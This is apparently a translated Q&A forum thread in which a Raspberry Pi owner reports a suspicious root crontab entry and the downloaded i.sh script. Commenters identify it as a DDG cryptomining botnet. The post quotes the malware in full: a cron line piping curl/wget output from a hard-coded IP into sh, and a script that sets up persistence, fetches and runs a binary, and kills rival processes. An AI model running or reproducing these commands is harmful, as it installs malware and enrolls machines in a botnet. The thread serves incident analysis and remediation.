मैं अपने रास्पबेरी पाई पर अपनी रूट क्रॉस्टैब फ़ाइल में कुछ जोड़ना चाहता था, और एक प्रविष्टि मिली जो मुझे संदेहास्पद लगती है, Google पर इसके कुछ हिस्सों को खोजना कुछ भी नहीं हुआ।
Crontab प्रविष्टि:
*/15 * * * * (/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4||curl -m180 -fsSL http://103.219.112.66:8000/i.sh||wget -q -T180 -O- http://103.219.112.66:8000/i.sh) | sh
की सामग्री http://103.219.112.66:8000/i.shहैं:
export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin
mkdir -p /var/spool/cron/crontabs
echo "" > /var/spool/cron/root
echo "*/15 * * * * (/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4||curl -fsSL -m180 http://103.219.112.66:8000/i.sh||wget -q -T180 -O- http://103.219.112.66:8000/i.sh) | sh" >> /var/spool/cron/root
cp -f /var/spool/cron/root /var/spool/cron/crontabs/root
cd /tmp
touch /usr/local/bin/writeable && cd /usr/local/bin/
touch /usr/libexec/writeable && cd /usr/libexec/
touch /usr/bin/writeable && cd /usr/bin/
rm -rf /usr/local/bin/writeable /usr/libexec/writeable /usr/bin/writeable
export PATH=$PATH:$(pwd)
ps auxf | grep -v grep | grep xribfa4 || rm -rf xribfa4
if [ ! -f "xribfa4" ]; then
curl -fsSL -m1800 http://103.219.112.66:8000/static/4004/ddgs.$(uname -m) -o xribfa4||wget -q -T1800 http://103.219.112.66:8000/static/4004/ddgs.$(uname -m) -O xribfa4
fi
chmod +x xribfa4
/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4
ps auxf | grep -v grep | grep xribbcb | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribbcc | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribbcd | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribbce | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribfa0 | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribfa1 | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribfa2 | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribfa3 | awk '{print $2}' | xargs kill -9
echo "*/15 * * * * (/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4||curl -m180 -fsSL http://103.219.112.66:8000/i.sh||wget -q -T180 -O- http://103.219.112.66:8000/i.sh) | sh" | crontab -
मेरा लिनक्स ज्ञान सीमित है, लेकिन मुझे ऐसा लगता है कि एक इंडोनेशियाई सर्वर से बायनेरी डाउनलोड करना और उन्हें नियमित रूप से रूट करना कुछ ऐसा नहीं है जो सामान्य है।
यह क्या है? मुझे क्या करना चाहिए?
16
यह गोलाकार है। हर 15 मिनट में यह स्वयं की एक नई प्रति डाउनलोड और इंस्टॉल करता है। यदि / जब दूरस्थ सर्वर पर प्रतिलिपि बदली जाती है, तो इस क्रोनजॉब को चलाने वाले सभी सर्वर 15 मिनट के भीतर, जो भी नया कोड है, निष्पादित करेंगे।
—
वाइल्डकार्ड
क्या आपकी रास्पबेरी पाई इंटरनेट पर खुली है? आपकी रास्पबेरी पाई क्या चल रही है? यह Google पर एकमात्र परिणाम है जब मैं xribfa4 खोजता हूं। यदि आप ऐसा सॉफ़्टवेयर नहीं चला रहे हैं जो ऐसा करने की आवश्यकता है तो यह एक वायरस है।
—
केमोटेप
@kemotep यह स्ट्रिंग रैंडम है, लेकिन IP के लिए google है और यह कुछ परिणाम देता है। एक ddg माइनिंग बॉटनेट के बारे में कुछ
—
frostschutz
मुझे यह मिला। इसका दीवाना यह है कि आईपी इंडोनेशियाई सरकार की साइट पर पंजीकृत है। यह भी लगता है कि इस पेलोड को वितरित करने वाले लगभग 2000 अन्य ips हैं।
—
केमोटेप
मुख्य बात यह है कि आप जानते हैं कि भले ही आप उस crontab प्रविष्टि को हटा दें, आपके सिस्टम में सबसे अधिक संभावना अभी भी भेद्यता है जो इसे संक्रमित होने की अनुमति देती है। आपको उस भेद्यता को खोजने और ठीक करने की आवश्यकता है।
—
हंस-मार्टिन मोजर